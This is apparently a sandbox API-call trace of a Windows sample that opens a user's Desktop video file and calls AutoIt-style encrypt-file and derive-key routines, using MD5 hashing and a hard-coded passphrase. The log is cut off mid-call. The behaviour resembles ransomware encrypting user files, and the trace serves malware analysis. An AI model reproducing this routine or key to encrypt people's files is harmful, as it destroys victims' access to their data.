RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0125.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0125.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caa60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0125.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0125.648] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0125.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0125.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0125.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0125.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0125.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0125.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0125.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0125.650] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tj494Ho-BBcDUp1CA.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\tj494ho-bbcdup1ca.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0125.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0125.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0125.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0125.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0125.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0125.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0125.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.652] FreeLibrary (hLibModule=0x772d0000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.654] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.654] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.655] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0125.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392650 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0125.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0125.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0125.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0125.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0125.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0125.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0125.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0125.657] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0125.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0125.657] CloseHandle (hObject=0x258) returned 1 [0125.658] FreeLibrary (hLibModule=0x772d0000) returned 1 [0125.658] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0125.658] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tj494Ho-BBcDUp1CA.mkv", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc91ac250, ftCreationTime.dwHighDateTime=0x1d5e92a, ftLastAccessTime.dwLowDateTime=0x37ffae10, ftLastAccessTime.dwHighDateTime=0x1d5e499, ftLastWriteTime.dwLowDateTime=0x37ffae10, ftLastWriteTime.dwHighDateTime=0x1d5e499, nFileSizeHigh=0x0, nFileSizeLow=0x16d36, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="Tj494Ho-BBcDUp1CA.mkv", cAlternateFileName="TJ494H~1.MKV")) returned 0x41ac600 [0125.658] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0125.658] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.658] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.658] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0125.658] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.659] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0125.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0125.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0125.659] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0125.660] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0125.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.660] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0125.660] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.660] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.660] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.660] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0125.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca940, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0125.660] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0125.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 